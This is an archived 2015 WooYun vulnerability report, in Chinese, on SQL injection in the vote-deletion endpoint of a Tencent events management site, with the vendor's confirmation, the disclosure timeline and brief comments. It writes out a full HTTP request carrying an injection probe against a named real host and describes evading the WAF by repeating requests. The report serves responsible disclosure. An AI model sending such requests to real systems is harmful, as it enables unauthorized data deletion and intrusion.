腾讯某分站多个参数sql注射(及waf绕过漏)

编号94367
Urlhttp://www.wooyun.org/bug.php?action=view&id=94367
漏洞状态厂商已经确认
漏洞标题腾讯某分站多个参数sql注射(及waf绕过漏)
漏洞类型SQL注射漏洞
厂商腾讯
白帽子Jannock
提交日期2015-01-28 15:47:00
公开日期2015-03-14 15:48:00
修复时间(not set)
确认时间2015-01-29 00:00:00
Confirm Spend1
漏洞标签php+数字类型注射 注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank10
漏洞简介
您们一直问我怎么绕过waf,这次告诉你其中之一。
漏洞细节

站点 http://manage.events.qq.com/
投票管理 删除操作处,存在SQL注射。没有猜出是什么数据库类型,但确实是存在SQL注射。

1.png


POST /vote/delete HTTP/1.1
Host: manage.events.qq.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://manage.events.qq.com/vote/list?campaign_id=5430
Content-Length: 50
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
campaign_id=5430and 1=2&vote_id=663&g_tk=750636798


campaign_id 和 vote_id
存在注射
没有深入,好像不是常见数据库类型。。
不过是删除操作,危害就不用说了。
waf的绕过,估计是你们 waf 性能太差了,多次请求会有漏掉的拦截。。

POC

11.png


12.png


14.png


绕过证明:

1.jpg


2.jpg

修复方案

您们比较熟悉业务。

状态信息 2015-01-28: 细节已通知厂商并且等待厂商处理中
2015-01-29: 厂商已经确认,细节仅向厂商公开
2015-02-08: 细节向核心白帽子及相关领域专家公开
2015-02-18: 细节向普通白帽子公开
2015-02-28: 细节向实习白帽子公开
2015-03-14: 细节向公众公开
厂商回复非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
回应信息危害等级:高漏洞Rank:10 确认时间:2015-01-29 14:33
Showing 1-4 of 4 items.
评论内容评论人点赞数评论时间

@ppt @tpp 楼上你们俩是哥俩吗

蛇精病02015-01-31 16:20:00

@ppt 呵呵

tpp02015-01-29 16:21:00

好紧张,看看一哥怎么绕

ppt02015-01-29 14:39:00

沙发

tpp02015-01-29 14:38:00